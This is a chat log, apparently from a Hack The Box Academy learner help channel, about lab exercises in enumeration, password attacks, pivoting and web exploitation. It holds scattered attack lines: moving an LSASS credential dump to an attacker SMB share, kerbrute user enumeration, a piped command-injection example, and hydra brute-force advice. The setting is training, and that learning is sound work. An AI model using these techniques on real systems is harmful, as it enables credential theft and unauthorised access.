I think you need to compile ClientGuiTest.java
Mm, but I edited the Invoker.java file
windows + shift + s, then you can ctrl v the pic
bro is a hardworking guy
yes, you need to edit the Invoker.java (change the config folder name)
then compile the ClientGuiTest.java
Nice got sick when I was having good progress
can someone help me?
I have a txt file, but it has nothing
it has 4KB and a flag
I can't find it
it's homework
this channel is about the academy modules so no one can help you with homework here
hdd
This isn’t a channel to have fun and post emojis in. Read the #rules
💀
what do I do then?
you deleted my hard work
Read the rules and #welcome
This isn’t a channel for emojis. Read the channel description
type shi
that wasn't very welcoming as a new member
As a new member of a community, one should read the rules and be a good member and obey them 😉
ok, but what is that server supposed to be? According to the title and description, it looks like a place to learn hacking, is it?
Yes. Read #welcome and you will understand more about the server and what it is about
ok
yeah totally what I need to learn
Just also know that you need to be 18 or have parental consent to create an account.
discord account?
Hack the Box account
I will look forward into that
Awesome
Hi,
working on the medium lab of Footprinting
I have been stuck after getting access to the SQL Management thing directory, which I guess is the MSQL that the hint is talking about, but I believe it is not externally accessible since it is not discovered by port scans
Am I supposed to download the whole folder and open it locally as if I installed it to explore it?
It is the sole idea that I have this far and got quite stuck for a long time
Any hint ?
there’s a hint in that section iirc
yeah, that is talking about some obscure MSQL app running
I found what I believe to be credentials for sys admin, but I am wondering how I am supposed to connect to this service since it is not running on any external port
To be honest, this server isn't really what I'm looking for after reading the welcome thing because its more for professional stuff, I found that server in the gaming category, which is why I'm here
Ah, I see. The main platform is “gamified”. But yes, the Academy has great content to learn
then the server is running internally and I guess you already RDP'd in
But good point 🙂
Alright then, see yall around...
Take care 👋
What a gamer 
He’s unspawned himself
Are any remote services running on any ports, i.e. RDP?
yes man, and for some reason i got lost in my running services and connected to everything else except this
Cool deal.
would there be any reason the password found for the sys admin account fails to log in to SQL Server? (bad grammar, English is not my primary lang)
What are some things people do with multiple accounts and passwords.
reuse passwords I guess
Would be worth a shot.
I'm working through the Password Attacks module, but am struggling to get Will's password in the Credential Hunting in Linux exercise. I saw the hint and have tried to brute force FTP & SSH with Kira using the provided password list and a mutated list that mutated the password in the hint. I also tried brute forcing FTP & SSH with Will using the provided password list. I am able to login to the IPC$ share with Kira's account, but there's nothing there and Kira's account doesn't have permission to the SHARE share. What am I missing?
I must be doing something wrong
but I figured out an admin user on the machine, and tried to connect to rpc with it but no password worked
is it because I use xfreerdp? (weird because it worked for the other user)
Hey, shoot me a DM so I can see what you're looking at and whatnot.
thanks man, rn
hello, in the attacking password hard lab, I found the pass for d** and went to his share, but when trying to download the b.vhd file it downloads it but the file is 0 bytes
is there any other way to get that file?
RDP and evil-winrm with this user isn't working
you didn't transfer the whole file
yes it is giving an error when getting it
something along the lines of "this is too big to download"
I can't remember what logon services there were, but I remember using PowerShell and Python FTP to get it
dm a pic
I don't remember if there's a timeout switch in smbclient
Good evening guys, anybody there for a few questions concerning Attacking DNS ?
I've exhausted all my ideas 😄
if you want to get help, you should mention which module/section you are working on, and what you have tried
I'm doing Attacking Common Services > Attacking DNS.
I'm kinda lost. Given that we have the records that we wanna query and the ns is given from the target's ip, I've tried a few things without success.
Zone Transfer, leads to transfer failed.
Enumeration: subbrute errors out if I add this nameserver to the resolvers. Subfinder does not return anything.
I must admit that I still have some fog in my head trying to wrap up the DNS concept, not as a concept itself, more from the results being returned from a dig query, for instance.
When I dig ns @ip inlanefreight.htb, does it mean I'm basically reading the /etc/hosts file of that ipaddress and looking for the inlanefreight.htb ns refs ?
Did you use subbrute
With the name server as the only ip in the resolvers file
I was using the ns record
ns.inlanefreight.htb
my god, it is not returning errors now, I guess it was due to that
Yeah, you don’t need the FQDN to use the name server
but why doesn't subbrute work with the FQDN as well?
It should if you added it to your /etc/hosts
goddamn
But it’s not needed
definitely need to make some DNS-related exercises
pwned!
I was expecting some PtH/PtT tbh
thank you very much btw 🙂
good evening, I'm stuck on the following question: "For your next hop, list the networks and then use a common remote access solution to pivot. Send the C:\Flag.txt located on the workstation." I have the SAM database but don't know how to copy this to my attacking machine. Module: Pivoting, Tunneling, and Port Forwarding
following the reading for the HTTPS section in Cracking into HTB, curl -k https://inlanefreight.com, which is the command shown in the article, produces nothing in the terminal, but curl -k https://www.inlanefreight.com... what's going on?
also does my pwnbox save its state across instances if i create folders and files?
when I connect with netcat, the first lines are the banner, right? And the administrator can change it?
yeah the first lines are usually a banner with a version number
I've seen the banner changed to different things sometimes too
a lot of port forwarding
Hey guys, I'm doing the File Transfers module, do you know why I can't do the transfer here? I do the same as the explanation?
Read the error message - were you told to use a specific option somewhere?
Yeah, I know that it doesn't recognize the -Post argument, but when I took a look again on HTB and asked GPT it gave me both the same, but it doesn't work
Where do you see the -Post argument in Academy out of interest?
hm
needs to be updated maybe?
Did you type out the command by hand, or copy paste?
hand
and the command is the same as from lolbas
yes
The example shows in a Command Prompt
I wonder if there is a difference in PS compared to CMD, sounds weird, but just a thought
https://academy.hackthebox.com/module/67/section/640 Hey guys, I'm working on the first question: I found a bunch of passwords but apparently those aren't the right ones; can I get a hint?
I don't see the -Post argument in the documentation on Windows though
..but here locally I see it
I'm trying in cmd but it's not working
Oh, I've not pulled the binary from lolbas
Could you raise the issue in #1234357888114364508 please?
Seems something odd is going on for sure
Oh nvm
If you get an error when running certreq.exe, the version you are using may not contain the -Post parameter. You can download an updated version here and try again.
okay, will do it, lolbas should update it too
That's below the example
oooh yeahh okay wait
nice exercise, I'm gonna try to transfer the exe from my attack host to the target host
anyone?
Hey Peeps, I'm working through the Password Attacks module, but am struggling to get Will's password in the Credential Hunting in Linux exercise. I saw the hint and have tried to brute force FTP & SSH with Kira using the provided password list and a mutated list that mutated the password in the hint. I also tried brute forcing FTP & SSH with Will using the provided password list. I am able to login to the IPC$ share with Kira's account, but there's nothing there and Kira's account doesn't have permission to the SHARE share. What am I missing?
the description for the Host header reads as:
Used to specify the host being queried for the resource. This can be a domain name or an IP address. HTTP servers can be configured to host different websites, which are revealed based on the hostname. This makes the host header an important enumeration target, as it can indicate the existence of other hosts on the target server.
but how can it indicate the existence of other hosts?
how long did you wait for the ftp attack?
they also gave you Kira's password already, so you could try and make variations of that
Fuzzing
something I'll learn about later?
no, I'm just starting
which module
cracking into HTB
depends on what path you will be taking next, but I know that they cover vhosts in "Web Fuzzing" and "Attacking Web Applications with FFUF"
also, "Information Gathering - Web Edition"
haven't fully planned that out, my current thinking was Cracking into HTB -> Basic Toolset -> OS Fundamentals, and then go from there
sounds good, they go over it in Basic Toolset
just finished Web Service and API Attacks, it seems like there's an unintended path for the skills assessment?
Until it finished. I did a mutation of Kira's that didn't work
hello guys
on Attacking Common Services
Attacking FTP
for ftp?
Yep
you definitely should've got a hit
did you put the exact password in a file then mutate it
Yep
Weird, right?
yeah, it worked for me
it's not on port 21 @fickle topaz
yeah, it's on port 2121, but I don't know what to do again
just switch the port number
how
what about that?
change the port number on hydra
<@&861185840277487616> looks like one
in the Nmap module, Firewall and IDS/IPS Evasion - Medium Lab
what does this mean
http://<target>/status.php
Recorded alerts: 49 / 100 alerts
Refresh Page (button)
I think that's how many alerts they got from your nmap
you get locked out for 3 minutes if maxed out
ty
I'm so confused reading this, what's the rule break? Explaining the module?
got deleted
hello, is it normal that these 3 techniques enumerated here don't work? https://academy.hackthebox.com/module/67/section/627
except for the first one, but when I take the administrator hash to connect with evil-winrm it doesn't work.
here I have got a shell with meterpreter but the command guid doesn't work
Hi - can I get a pointer for the academy's Firewall and IDS/IPS Evasion nmap hard lab - I can only see 2 ports open but can't find the answer to the question, not even with the hint
do a full port scan on both tcp and udp 😉
Was literally just about to start the udp scan 😅
Anyone able to give any hint for question 3 about the API key on information gathering web edition skills assessment? None of the wordlists in seclists are producing any results
why does this injection work? | whoami on a direct command injection?
try any command | whoami on your machine
sorry! I mean ping -c | whoami is working and giving me the whoami command in a command injection
yeah it will work
hm ok let me try
this is how bash works
yes sorry, I didn't see the sense but it actually works, ty
Does anyone have any clues to solve Firewall and IDS/IPS Evasion - Hard Lab?
Hey guys
Everything you need is in that last section.
PC or laptop?
For what
Work, games, VMware etc.
If you will use the device at the same place all the time, I’d go for a desktop
desktop is better, but that's if you don't move too much
I got confused in SMB enumeration, some extra resource which can help me here?
if NetBIOS is used for hostname resolution and hostname registration, why do I see microsoft-ds as a service name in an nmap scan on port 139? This is a part of the NetBIOS API which provides network services like file and printer sharing, but wait a min, we are using SMB for this purpose, so why the hell do I see that
someone helping me here? 🙂
same question. can anyone hint?
which module, section?
Footprinting module, SMB section
let me look it up, wait a minute
which task is it?
there is no nmap scan, I was saying this as I see microsoft-ds on port 139 a lot of the time. no, there is no exercise or question, just my doubt
The webshell section with the laudanum aspx shell. First of all, uploading and accessing an aspx shell on Pwnbox didn't work, got 404 however I tried accessing it. Connected with VPN from Kali and still 404. When switching to another aspx webshell (not laudanum specifically), it worked to get the shell access. So far so good. But for question 2, even copy/pasting the entire path from Pwnbox, I get wrong answer 😱 I love your course, but these kinds of questions slow the learning process up; I have to spend too much time just getting past a question that is not technical, not fruitful, just annoying. How to bypass this since not even the correct answer is ok???
"microsoft-ds" on port 139 is common for Windows file sharing. I don't think you should be concerned about it.
You are making it difficult for yourself. I am certain you didn't edit and add your IP.
SMB runs on ports 445 + 139. It used to run on NetBIOS only (port 139); however, the latest Windows versions run on 445. For backward compatibility you will see that SMB runs on 139 as well.
Plus you are most likely confused about the path which they are asking for. Upload the shell again and keep your eyes open to observe the changes.
why does it matter in the first place what port the service is running on? we can assign different ports to different services, only a few ports are not changeable, which are absolute kind (ICMP, BGP, DHCP, DNS, NTP) or maybe a few more
how sure are you?
that is definitely an issue on your end. I just did xfreerdp and it was working
have you tried remmina?
ohhhhh. try resetting your vpn config?
try remmina
there is rdesktop too
or krdc
or vinagre
but i think first 2 should work
1. no, not at all, thank you. 2. they ask for the path 'on the pwnbox', which I interpret as the file path to the shell on the file system of the Pwnbox. Which does not work as an answer. So the question is not about the shell itself, or access to the remote host; it's solely related to q2, which asks for the path on the attack box
is that even running?
oh sorry I got the path confused 🤦♂️. which path have you tried?
🤔 this either happens with a faulty vpn config or a down target
have you tried it on Pwnbox?
target is pinging, seems to be VPN stuff
No worries, thank you. I used the absolute path to the laudanum aspx-webshell (including the name of the file itself) on the pwnbox
module sir
dm me the path
✅
what was the problem?
thats what she said.
I need help on the skills assessment question 3 of information gathering web edition, I got all the other questions but I can't seem to find the api key in the admin directory
Sometimes you need to perform the same trick, on your new target
I got that, just not the third question lol
Let me check for you
is your VPN config UDP? UDP is weird with RDP
the thing is you are able to connect, it's just not letting your user log in
here
can you drop the command?
you used here.
right
is it possible it's not taking it because of this ' but it needs this " instead in the password?
there is another command that I used, not sure if that will work, but try xfreerdp /v:10.129.230.228 /u:<user> /p:"Academy_student_AD!" +sec-nla +sec-tls
wait, an off-topic question: are you using Cloudflare WARP? or any custom DNS on your primary host?
xfreerdp /v:10.129.7.53 /u:htb-user /p:'Academy_student_AD!' /cert:ignore /sec:rdp
try this it will force it to connect
the error is related to time out
Hello everyone
help me pls
osTicket: Attacking Common Applications
Find your way into the osTicket instance and submit the password sent from the Customer Support Agent to the customer Charles Smithson.
I created ticket and signed in
Now what should I do
I had this in another module yesterday, not sure if it's connected, but just reset a couple of times
if you check, port 3389 might be closed
MIGHT, cuz that's what happened with me
try nmapping it on port 3389 only
let me check with gpt
oh it is open
is there any other port which might be there for rdp
weird, ok which module is this? which section?
try -p- in this nmap command
fuck, even I didn't notice from the image
hope it helps :D
though I haven't opened the module
5+ hours on the same blunder I did 3 days back on another module lol
have you tried -p- ?
did you try switching the VPN server?
rdp in that module is always 3389 ( at least from what i remember)
waiting target to spawn 🙂
well thats how things work in this field 😋
yeah you are right, but it's confusing looking at the nmap output which says the service name microsoft-ds on both 445 and 139. so yeah, they both are used by SMB, and NetBIOS is deprecated but we can still see that for backward compatibility
xfreerdp
Contact support, there's also the /tls-seclevel:0 flag it could help
does it say fail to connect or connects with a black screen?
target still not spawning for me, there's probably some issues in academy labs rn, I would say move a bit to other sections then come back to this
oh
at this point contact support then, I tried to help but I can't even spawn the target 😂
.
I think academy boxes also should have a hard restart like the one in Endgame.
Academy labs are self-instanced and you can reset the labs whenever you want
it won't cause the issues I related to connection timeout
then why is this issue persisting?
Anyone ?
The issue is mostly with rdp, most of labs got a very slow rdp, maybe configuration not sure
Unknown command ls.
Good morning mates, I'm still stuck in the port forwarding and tunneling module. I don't know how to send the SAM database to my local host to do the decryption, can anyone give me details?
C:\Users\mlefay\AppData\Local\Temp>move lsass.DMP \\10.10.14.63\CompData
The network path was not found.
Morning, in AD Enumeration & Attacks > Initial Enumeration: general question about kerbrute
I got tripped up trying to run kerbrute from my attack host before finding it's installed on the pivot this lab provides.
Still, I don't understand if there's a way to run kerbrute from my attack host through a proxy. I had ligolo working. I could ping and nmap on TCP+UDP ports 88 showing I could communicate with the service. No luck though, I kept getting communication errors.
Is there a way to do this through a proxy or, alternatively, has anyone found instructions for statically compiling kerbrute?
user@box:~$ sudo ./kerbrute userenum -d INLANEFREIGHT.LOCAL --dc 172.15.5.5 ./jsmith.txt -o ./valid_ad_users
failed to communicate with KDC. Attempts made with UDP (error sending to a KDC: error sneding to 172.15.5.5:88:
If you're working through a pivot, computers on the foreign network don't know how to reach 10.10.14.63.
What computers can they reach?
See #welcome and follow the instructions there.
Also, does kerbrute's -o flag to output results to a file not work? 🤔
I need help
What is that
I got the thumbs up for a reason
Sorry, I was mobile for a minute and should have added more context.
If you need assistance with an Academy module, state both the module and section with which you're having difficulty + ask your question. We often get people saying "I need help with ..." or "can I ask a Q about..." instead of just saying what they need help with. Don't ask to ask, just ask the question.
did all steps, updatedb shows permission denied even though I'm using root privileges.
sudo updatedb should work 🤔 I tried it today it did work for me
help me pls :
Attacking GitLab
Gain remote code execution on the GitLab instance. Submit the flag in the directory you land in.
I have a username but I dont have a password
I'm using Pwnbox, doing this via the foothold machine. did you do the same?
I did
....
do you have notes on it? the commands you ran
Be patient young padawan
Haven’t done that module, sorry
So am I a padawan?
Hi, I need help with this question: According to the paypal.com website in October 1999, what could you use to "beam money to anyone"? Answer with the product name, eg My Device, remove the ™ from your answer. There is no October 1999 record anymore for paypal
I just meant, be patient, you can’t expect to have an answer if you post something at xx:08 and you have no response at xx:09
ok
If someone can help me I would really appreciate it, I'm stuck on this last question for 1+ hour
for
Navigate to http://[Target IP]:8000, open the "Search & Reporting" application, and find through an SPL search against all 4624 events the count of distinct computers accessed by the account name SYSTEM.
is it not 4/four/Four? used dedup and dc(host) by hostname
copy and paste it from the site, it uses a 0 instead of an O if I remember correctly.
palm0s instead of palmos
silly stuff
which module and section?
Thought I'd ask if someone has more insight. On https://academy.hackthebox.com/module/112/section/1073 footprinting IMAP / POP3, why does Evolution mail successfully connect to the server as expected, while Thunderbird seems to be unable to; even after trying various connection settings + ports for IMAP and trusting the TLS certificate? If you can get Thunderbird to successfully connect, what settings are you using? 🤔
There are even two entries in October 1999, both on the same day
Yeaaaaaa
Legit, now I see it lmao. I tried this 2 hours before and it didn't show it to me.
Understanding Log Sources & Investigating with Splunk: first module
you need to open the website. the answer is very obvious when you do that
Hello bro, how to find Dxxx password?
My problem was that in the Wayback Machine there was no 1999 result when I first checked.
Ok I found it now
Ty for the help
Anyone done the Session Attacks skill assessment?
https://academy.hackthebox.com/module/153/section/1458
RE: Question 1 -- I'm wondering if I need to fuzz for first.last@example.com email addresses. This could take a WHILE and may not be technically related to the assessment, and I'm unsure how else to go about finding the admin account by email; no API to return role or anything that I'm aware of.
which section?
first
Curious, is this part of the SOC path? I'm looking forward to doing that soon.
I'd suggest using GPT to create queries as needed. Do you understand the question?
Yes, it is. It's fun, more than CPTS ngl.
Nice, I'll have to remember that.
Create your own user
well the doc that I shared with you, I ran only that. I can guarantee you that sudo updatedb will work
After that just run msfconsole; the module will be there.
I tried but response is error 422
did you find out what field is vulnerable
I hate when this happens. I'm performing the same steps. Did it twice. Gonna try one last time.
Yes, I know the vuln field, and I learned how to fuzz unknowns like this in previous modules. It just seems a little overkill to take seclist/../firstNames.txt & lastNames.txt and like, ... pitchfork them (or whatever ffuf calls it).
Wait hold on. Two fields will say perm denied
you don't need to worry about them though
and you tried getting the cookies
I haven't tried that yet. Is there some sort of automated admin request being made that will deliver the cookie without an actual user (admin) viewing the page? I hadn't considered that.
Bro, I understand the question. Asking if it's 4 distinct PCs or not.
I did the lab a long time ago and can't remember exactly. But according to my notes, I created my own user
Can I write to your DM?
sure
ok thanks
sure
I may complete the SOC path for THM as well. I absolutely loved it.
There is an endpoint that is given to you in the description, look for it and see if you can find a vulnerable parameter.
I've got cookie logging going, visiting the page. Only getting my own cookie (as expected). Is there something simple I'm missing?
Ah ok, I thought that was merely for flag submission.
Bumping this Q on if it's possible to use kerbrute through a pivot or how to statically compile to run on a pivot.
got it, thx
Nice 👍
left you some Rep, much appreciated
I've definitely used it through a pivot with sshuttle. After I get done with some stuff I am working on, I can fire up my pivoting lab and play around with different pivoting tools and kerbrute. As for the -o switch, I can't recall if I normally use that or simply > output.txt and then cut out the junk. I'll see if I have an old screenshot that I can refer to and will let you know.
I did check in msfconsole after all steps. Still did not show.
That's weird, I just completed that section today.
okay
@old oasis now I feel silly, I made that WAY more difficult than it needed to be. The description (the endpoint) did fool me a bit, dunno if that was the intent or something got lost in translation there.
how did you search it inside metasploit?
I think before adding the module the count was 2150, later it's 2151, maybe I'm just unable to search-
We've all been there. Overthinking is our greatest enemy 😄
@sacred jacinth got it! I had to run the reload_all command inside Metasploit to get it right.
"Find all TCP ports on your target. Submit the total number of found TCP ports as the answer." How do I find the total number of TCP ports? I ran sudo nmap <ip> but it didn't give me the number of all TCP ports, it just showed me TCP ports and their numbers.
I just quit and rerun it
When you run nmap without any port flags it will only look for the most common ports. Use the -p- flag to scan all ports.
I didn't really have to do it, but finally congrats buddy!
yeah.
like this? sudo nmap -p- 10.129.2.49